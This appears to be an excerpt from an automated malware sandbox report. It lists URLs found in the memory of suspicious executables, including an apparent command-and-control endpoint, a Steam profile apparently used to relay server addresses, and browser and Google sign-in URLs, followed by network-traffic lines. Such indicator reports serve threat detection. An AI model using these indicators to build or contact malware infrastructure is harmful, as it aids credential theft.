Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997243319001
Source: ea2c7beae0.exe, 00000007.00000003.2443518589.000000000103E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900t
Source: ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/sG
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: skotes.exe, 0000000D.00000003.2668339801.0000000001676000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.0000000001676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/765611997243319007
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900Ud
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: ea2c7beae0.exe, 00000007.00000003.2443701449.0000000001084000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd883ccb3237fa39
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000001083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampoweredX
Source: ea2c7beae0.exe, 00000010.00000003.2740761284.00000000007C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store/api
Source: skotes.exe, 0000000D.00000003.2668339801.0000000001676000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.0000000001676000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api:d
Source: ea2c7beae0.exe, 0000000B.00000003.2603901519.000000000551E000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785260915.00000000053B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.0000000005515000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2603901519.000000000551C000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.00000000053AA000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785260915.00000000053B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.00000000054F0000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.0000000005385000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.0000000005515000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2603901519.000000000551C000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.00000000053AA000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785260915.00000000053B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ea2c7beae0.exe, 0000000B.00000003.2603997496.00000000054F0000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785413689.0000000005385000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ea2c7beae0.exe, 00000010.00000003.2817250270.0000000005375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: ea2c7beae0.exe, 00000007.00000003.2461981154.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587460635.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2894096560.0000000000829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: ea2c7beae0.exe, 00000007.00000003.2461981154.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/a
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785733963.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786592123.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2799731430.000000000083D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acc
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785733963.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786592123.000000000083D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2799731430.000000000083D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/accHH3
Source: ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acces
Source: ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: ea2c7beae0.exe, 0000000B.00000003.2604502304.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2604288546.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785893107.0000000005384000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786052209.000000000536D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ea2c7beae0.exe, 00000010.00000003.2817250270.0000000005375000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: ea2c7beae0.exe, 0000000B.00000003.2604502304.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2604288546.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2785893107.0000000005384000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2786052209.000000000536D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: ea2c7beae0.exe, 0000000B.00000003.2643177611.00000000055E2000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ea2c7beae0.exe, 0000000B.00000003.2643177611.00000000055E2000.00000004.00000800.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2816630872.000000000547C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2921279103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdY
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
